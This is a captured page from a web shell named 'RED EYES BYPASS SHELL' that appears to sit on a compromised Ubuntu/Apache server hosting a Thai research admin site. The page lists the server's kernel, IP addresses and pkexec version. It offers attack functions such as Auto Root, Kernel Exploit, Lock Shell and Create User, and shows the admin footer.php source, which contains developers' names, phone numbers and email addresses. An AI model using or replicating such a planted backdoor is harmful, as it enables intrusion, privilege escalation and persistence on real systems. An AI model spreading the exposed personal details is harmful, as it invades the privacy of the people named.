Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
rdiresearch /
admin /
structure /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
footer.php
7.45
KB
-rwxr-xr-x
function_php_oop.php
11.28
KB
-rwxr-xr-x
index.php
140.61
KB
-rwxr-xr-x
link.php
2.73
KB
-rwxr-xr-x
main_menu.php
17.13
KB
-rwxr-xr-x
main_navbar.php
4.53
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php //Develop By Arnon Manomuang //พัฒนาเว็บไซต์โดย นายอานนท์ มะโนเมือง //Tel 0631146517 , 0946164461 //โทร 0631146517 , 0946164461 //Email: manomuang@hotmail.com , manomuang11@gmail.com , manomuang@gmail.com //Develop By Kunlathon Saowakhon //พัฒนาเว็บไซต์โดย นายกุลธร เสาวคนธ์ //Tel 0932670639 //โทร 0932670639 //Email: beer.coding007@gmail.com , missing_yrc2014@hotmail.com if (preg_match("/footer.php/", $_SERVER['PHP_SELF'])) { Header("Location: ../index.php"); die(); } else { check_login('admin_username_netcmru', 'login.php'); ?> <!--++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--> <!-- Warning Section Starts --> <!-- Older IE warning message --> <!--[if lt IE 10]> <div class="ie-warning"> <h1>Warning!!</h1> <p>You are using an outdated version of Internet Explorer, please upgrade <br/>to any of the following web browsers to access this website.</p> <div class="iew-container"> <ul class="iew-download"> <li> <a href="http://www.google.com/chrome/"> <img src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/images/browser/chrome.png" alt="Chrome"> <div>Chrome</div> </a> </li> <li> <a href="https://www.mozilla.org/en-US/firefox/new/"> <img src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/images/browser/firefox.png" alt="Firefox"> <div>Firefox</div> </a> </li> <li> <a href="http://www.opera.com"> <img src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/images/browser/opera.png" alt="Opera"> <div>Opera</div> </a> </li> <li> <a href="https://www.apple.com/safari/"> <img src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/images/browser/safari.png" alt="Safari"> <div>Safari</div> </a> </li> <li> <a href="http://windows.microsoft.com/en-us/internet-explorer/download-ie"> <img src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/images/browser/ie.png" alt=""> <div>IE (9 & above)</div> </a> </li> </ul> </div> <p>Sorry for the inconvenience!</p> </div> <![endif]--> <!-- Warning Section Ends --> <?php if (($modules == "dashboard")) { include("js_code/dashboard/dashboard_js.php"); } elseif (($modules == "school")) { include("js_code/school/school_js.php"); } elseif (($modules == "profile")) { include("js_code/profile/profile_js.php"); } elseif (($modules == "changepass")) { include("js_code/changepass/changepass_js.php"); //---------------------------------------------------------------------------------------- } elseif (($modules == "user")) { include("js_code/user/user_js.php"); } elseif (($modules == "teacher_data")) { include("js_code/teacher_data/teacher_data_js.php"); } elseif (($modules == "check_payment")) { include("js_code/check_payment/check_payment_js.php"); } elseif (($modules == "payment_show")) { include("js_code/payment_show/payment_show_js.php"); } elseif (($modules == "manage_payment")) { include("js_code/manage_payment/manage_payment_js.php"); //---------------------------------------------------------------------------------------- } elseif (($modules == "document")) { include("js_code/document/document_js.php"); } elseif (($modules == "document_category")) { include("js_code/document_category/document_category_js.php"); //---------------------------------------------------------------------------------------- } elseif (($modules == "project_all")) { include("js_code/project_all/project_all_js.php"); } elseif (($modules == "publish_all")) { include("js_code/publish_all/publish_all_js.php"); } elseif (($modules == "faculty_data")) { include("js_code/faculty_data/faculty_data_js.php"); } elseif (($modules == "research_data")) { include("js_code/research_data/research_data_js.php"); } elseif (($modules == "publish_data")) { include("js_code/publish_data/publish_data_js.php"); } else { } ?> <!-- Required Jquery --> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/jquery/dist/jquery.min.js"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/jquery-ui/jquery-ui.min.js"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/popper.js/dist/umd/popper.min.js"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- jquery slimscroll js --> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- modernizr js --> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/modernizr/modernizr.js"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/modernizr/feature-detects/css-scrollbars.js"></script> <!-- Chart js --> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/bower_components/chart.js/dist/Chart.js"></script> <!-- Google map js --> <script src="https://developers.google.com/maps/documentation/javascript/examples/markerclusterer/markerclusterer.js"></script> <script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/google-maps/gmaps.js"></script> <!-- gauge js --> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/widget/gauge/gauge.min.js "></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/widget/amchart/amcharts.js"></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/widget/amchart/serial.js"></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/widget/amchart/gauge.js"></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/widget/amchart/pie.js"></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/widget/amchart/light.js"></script> <!-- Custom js --> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/js/pcoded.min.js"></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/js/vartical-layout.min.js"></script> <script src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/js/jquery.mCustomScrollbar.concat.min.js"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/pages/dashboard/crm-dashboard.min.js"></script> <script type="text/javascript" src="<?php echo $RunLink->Call_Link_System(); ?>/assets/assets/js/script.js"></script> <!--++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--> <?php } ?>
Close